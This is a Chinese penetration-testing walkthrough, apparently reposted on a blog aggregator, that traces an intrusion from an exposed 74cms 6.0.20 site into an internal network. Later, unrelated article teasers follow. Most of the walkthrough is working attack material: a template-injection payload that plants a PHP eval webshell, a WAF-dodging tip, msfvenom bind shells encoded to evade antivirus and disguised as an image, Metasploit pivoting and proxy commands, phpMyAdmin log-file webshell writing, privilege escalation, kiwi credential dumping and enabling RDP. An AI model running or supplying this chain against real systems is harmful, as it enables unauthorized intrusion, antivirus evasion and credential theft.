内网渗透-src挖掘-互联网打点到内网渗透-2023年2月

news2024/12/24 22:01:46

1、通过信息搜集,发现目标有一个互联网访问的骑士cms
在这里插入图片描述
2、发现该系统骑士cms版本为6.0.20,通过搜索,发现骑士cms < 6.0.48存在任意文件包含漏洞在这里插入图片描述

/Application/Common/Controller/BaseController.class.php 该文件的assign_resume_tpl函数因为过滤不严格,导致了模板注入,可以进行远程命令执行

3、复现该漏洞:
访问地址:

http://ip/index.php?m=home&a=assign_resume_tpl

添加如下post数据

variable=1&tpl=<?php fputs(fopen("tx.php","w"),"<?php eval(\$_POST[x]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>

此时,系统会提示报错

在这里插入图片描述
此时在日志中会有一条结果:(文件名构成:年份+月份+日期.log
开始文件包含:

http://ip:81/index.php?m=home&a=assign_resume_tpl

POST部分:(注意包含的时候,要对应日期)

variable=1&tpl=data/Runtime/Logs/Home/23_02_10.log

在这里插入图片描述
此时在upload目录下已经存在了tx.php
由于系统有waf,文件名不能用shell.php,会被被拦截,要避免!
在这里插入图片描述
使用蚁剑连接http://ip:/81/tx.php,密码为x
在这里插入图片描述
4、msf上线
msf首先生成linux木马,因为宝塔存在宝塔,会干扰反向连接的木马,所以在这里生成的是一个正向木马
在这里插入图片描述
创建正向连接木马

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=6677 -f elf > 6677.elf

在这里插入图片描述
上传至webshell,赋予权限,执行
在这里插入图片描述
msfconsole中执行

use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set RHOST xxx.xxx.xxx.xxx
set LPORT 6677
exploit

在这里插入图片描述
使用ifconfig,发现目标是双网卡
在这里插入图片描述
设置代理,添加路由:

添加路由
run post/multi/manage/autoroute
加代理
run auxiliary/server/socks_proxy

5、内网扫描
使用auxiliary/scanner/portscan/tcp模块进行主机存活扫描

use auxiliary/scanner/portscan/tcp
show options
set rhosts 10.0.20.0/24
set ports 21,22,23,80,443,8080,3389,445,3306,1433
exploit

或者使用proxifier直接代理,本机可直接访问到内网在这里插入图片描述
使用nmap进行扫描也可以,但是要注意,此时由于是用的socket连接,socket协议不支持icmp,所以nmap命令要用到

-sT -Pn

在这里插入图片描述
6、在这里看到开放了3306端口,那访问下试试看:
在这里插入图片描述
此时看到3306开放的服务是mysql。扫描下目录试试看:

dirsearch  -u http://10.0.20.133 --proxy socks5://127.0.0.1:1080

在这里插入图片描述
这里就可以看出来,这是一个phpstudy搭建的网站了,尝试访问:

http://10.0.20.133/phpMyAdmin/

在这里插入图片描述

发现有弱口令root/root,成功进入
在这里插入图片描述
7、通过phpmyadmin写日志getshell

查看日志情况
SHOW  VARIABLES  LIKE  '%general%'

在这里插入图片描述
因为默认是关闭的,所以先将 general_log 设置为on,执行

set global general_log=on;

在这里插入图片描述
再次查询,发现已打开
在这里插入图片描述
修改log文件的名称和位置

set global general_log_file='C:/phpstudy/PHPTutorial/www/vulntarget.php';

验证文件是否存在

http://10.0.20.133/vulntarget.php

在这里插入图片描述
写入一句话:

SELECT '<?php eval($_POST["vuln"]); ?>'

在这里插入图片描述
此时一句话木马已经在日志中打印出来了
使用蚁剑先添加sockets代理
在这里插入图片描述
蚁剑连接成功
在这里插入图片描述
8、内网提权
此时使用蚁剑whoami,查看用户权限为普通用户权限。
在这里插入图片描述
已经拿到了其中一个crow的权限,但是在这里我们想拿到system权限。使用tasklist /svc来查看有哪些杀毒软件:

tasklist /svc

查询:https://i.hacking8.com/tiquan/发现系统存在火绒防病毒软件。
在这里插入图片描述
做一个免杀上线msf:
免杀方法:https://mp.weixin.qq.com/s/PK53c-Fgay8-2i6co_a7GA

msfvenom -p windows/meterpreter/bind_tcp  -e x86/shikata_ga_nai -i 7 -b '\x00'  lport=1234  -f raw -o crowsec.jpg

新生成的文件和加载器通过蚁剑上传到win7中:
在这里插入图片描述
msf开启监听,木马直接运行:

use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 10.0.20.133
set lport 1234
exploit

可见获取了目标shell
在这里插入图片描述
提权测试:getsystem,提权成功
在这里插入图片描述
9、抓取密码

load kiwi

在这里插入图片描述

在这里发现当前没办法抓到密码,主要是因为上面生成的木马是32位的。(如果生成的木马是64位的,就没有这个问题)
getpid和ps查看一下进程:
在这里插入图片描述
在这里插入图片描述
那在这里将进程迁移到x64位上去:
migrate 504
在这里插入图片描述
注意迁移的时候,要迁移到system的user上。
在这里插入图片描述
再次执行命令,即可获取明文密码。

creds_all

在这里插入图片描述
得到用户名:crow 密码:admin
10、3389远程连接

run post/windows/manage/enable_rdp

在这里插入图片描述
配置代理之后,连接即可。
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/344176.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

字节面试惨败,闭关修炼再战美团(Android 面经~)

作者&#xff1a;王旭 前言 本人从事Android 开发已经有5年了&#xff0c;受末日寒气影响&#xff0c;被迫在家休整&#xff0c;事后第一家选择字节跳动面试&#xff0c;无奈的被面试官虐得“体无完肤”&#xff0c;好在自己并未气馁&#xff0c;于是回家开始回家进行闭关修炼…

使用红黑树模拟实现map和set

在STL的源代码中&#xff0c;map和set的底层原理都是红黑树。但这颗红黑树跟我们单独写的红黑树不一样&#xff0c;它需要改造一下&#xff1a; 改造红黑树 节点的定义 因为map和set的底层都是红黑树。而且map是拥有键值对pair<K,V>的&#xff0c;而set是没有键值对&a…

教育行业需要什么样的数字产品?

数字化转型的浪潮已经席卷了各行各业&#xff0c;不仅出现在互联网、电商、建筑等行业&#xff0c;还应用在了教育行业。数字化的教育ERP软件能够在满足学校需求的基础上&#xff0c;帮助学校完善各类工作流程&#xff0c;提高工作效率。 对于一个拥有多个校区&#xff0c;上万…

ChatGPT 也太火了吧 ...

最近 ChatGPT 太火了&#xff0c;微信指数 ChatGPT 关键词飙升。GitHub 上也不例外&#xff0c;最近热门项目都是 ChatGPT 项目。后续会陆续更新 ChatGPT 好玩的开源项目&#xff0c;本期是本周登上热榜的 Repo&#xff0c;请查收。本期推荐开源项目目录&#xff1a;1. 对 Chat…

ms17-010(永恒之蓝漏洞复现)

✅作者简介&#xff1a;CSDN内容合伙人、信息安全专业在校大学生&#x1f3c6; &#x1f525;系列专栏 &#xff1a;HW-2023-漏洞复现 &#x1f4c3;新人博主 &#xff1a;欢迎点赞收藏关注&#xff0c;会回访&#xff01; &#x1f4ac;舞台再大&#xff0c;你不上台&#xff…

Inception-Resnet-v1、Inception-Resnet-v2学习笔记

Inception-Resnet-v1、Inception-Resnet-v2来自2016年谷歌发表的这篇论文&#xff1a;Inception-v4 Inception-ResNet and the Impact of Residual Connections on Learning&#xff0c;附论文链接&#xff1a; [1602.07261] Inception-v4, Inception-ResNet and the Impact o…

【思维模型】概率思维的价值:找到你的人生算法!打开你的人生格局!实现认知跃迁!

把同样公平的机会放在放在很多人面前,不同的人生算法,会得到迥然不同的结果。 概率思维是什么? 【ChatGPT】概率思维是一种通过使用数学模型来思考和评估不确定性事件的方法。它通过计算不同可能性的概率来预测事件的结果,并评估风险和机会。 概率思维的价值在于它可以帮…

CSS样式表继承和优先级

CSS样式表继承 要想了解css样式表的继承&#xff0c;我们先从文档树&#xff08;HTML DOM&#xff09;开始。文档树由HTML元素组成。 文档树和家族树类似&#xff0c;也有祖先、后代、父亲、孩子和兄弟_。 那么CSS样式表继承指的是&#xff0c;特定的CSS属性向下传递到子孙元…

智能三子棋(人机大战)—— 你会是最终赢家吗?万字讲解让你实现与自己对弈

魔王的介绍&#xff1a;&#x1f636;‍&#x1f32b;️一名双非本科大一小白。魔王的目标&#xff1a;&#x1f92f;努力赶上周围卷王的脚步。魔王的主页&#xff1a;&#x1f525;&#x1f525;&#x1f525;大魔王.&#x1f525;&#x1f525;&#x1f525; ❤️‍&#x1…

2023年湖北建设厅七大员八大员报名怎么收费呢?

建设厅七大员八大员全国统一报名网站&#xff0c;证书全国通用&#xff0c;无需调转&#xff0c;这点还是很方便的&#xff0c;所有在湖北考的证书全国都能用呢。 八大员报考机构很多&#xff0c;收费也是层次不齐&#xff0c;这里需要提醒大家注意的是&#xff0c;咨询八大员的…

如何持续架构治理?我们和 ChatGPT 聊了一会?

在上周的 QCon 北京 2022 大会上&#xff0c;我和我的同事黄雨青一起分享了《组织级架构治理的正确方式》&#xff0c;以帮助开发人员对组织级架构治理体系全貌一瞥&#xff0c;并厘清治理工具的设计思路和核心功能内容。结合我们在 ArchGuard 的探索经验&#xff0c;我们&…

自有APP上如何运行小游戏?

近年来小程序游戏迎来了爆发式增长。微信、支付宝、抖音等各大平台小程序游戏愈加丰富&#xff0c;你是否也让自己的App也拥有运行丰富的小游戏的能力&#xff1f;今天就来带大家看看如何实现。 我们先来看看各互联网巨头关于小游戏生态的特征&#xff1a; 「微信」 率先推出…

open3d点云配准函数registration_icp

文章目录基本原理open3d调用绘图基本原理 ICP, 即Iterative Closest Point, 迭代点算法。 ICP算法有多种形式&#xff0c;其中最简单的思路就是比较点与点之间的距离&#xff0c;对于点云P{pi},Q{qi}P\{p_i\}, Q\{q_i\}P{pi​},Q{qi​}而言&#xff0c;如果二者是同一目标&am…

如何将一张纹理图贴在模型上

前言 小伙伴们是否有过这样的场景:看到一个精美的3D模型&#xff0c;很想知道它是如何被创作出来的&#xff1f;于是开始了一番搜索引擎查找之后&#xff0c;得知需要建模工具来完成&#xff0c;例如3D Max、Maya、Blender、Photoshop。那么本篇就使用这些工具来完成一个精美的…

Redis【包括Redis 的安装+本地远程连接】

Redis 一、为什么要用缓存&#xff1f; 缓存定义 缓存是一个高速数据交换的存储器&#xff0c;使用它可以快速的访问和操作数据。 程序中的缓存 在我们程序中&#xff0c;如果没有使用缓存&#xff0c;程序的调用流程是直接访问数据库的&#xff1b; 如果多个程序调用一个数…

如何在原始的认知上找回自己

认知、欲望加恐惧&#xff0c;这三种要素在我们对一个事物的判断中都在起作用&#xff0c;只不过配比不一样&#xff0c;导致你的判断不一样。我们通常以为有了认知能力&#xff0c;就产生了认知&#xff0c;就如同面前有一个东西&#xff0c;你用照相机拍下来就成了一张照片—…

【算法基础】高精度除法

&#x1f466;个人主页&#xff1a;Weraphael ✍&#x1f3fb;作者简介&#xff1a;目前是C语言 算法学习者 ✈️专栏&#xff1a;【C/C】算法 &#x1f40b; 希望大家多多支持&#xff0c;咱一起进步&#xff01;&#x1f601; 如果文章对你有帮助的话 欢迎 评论&#x1f4ac…

PN外加电场后电场变化

没有外加电场时&#xff08;下面都是以外加反向电场分析&#xff09; 中间两条实线假设是PN节在没有外加电场的情况下形成的一个内部电场边界。 形成原因 实用的半导体一般是混合物 P型半导体&#xff0c;实际上是一种4价和3价元素的混合物。化学中都知道达到4或8的外层电子…

论文浅尝 | KGE by Adaptive Limit Scoring Loss Using DWS

笔记整理&#xff1a;陈磊&#xff0c;天津大学硕士链接&#xff1a;https://ieeexplore.ieee.org/ielx7/6287639/7859429/08057770.pdf动机设计一个强大而有效的损失框架对于知识图嵌入模型区分正确和不正确的三元组至关重要。经典的基于边距的排名损失将正负三元组的分数限制…

极智AI | 算能SDK架构

欢迎关注我的公众号 [极智视界]&#xff0c;获取我的更多经验分享 大家好&#xff0c;我是极智视界&#xff0c;本文介绍一下 算能SDK架构。 邀您加入我的知识星球「极智视界」&#xff0c;星球内有超多好玩的项目实战源码下载&#xff0c;链接&#xff1a;https://t.zsxq.com…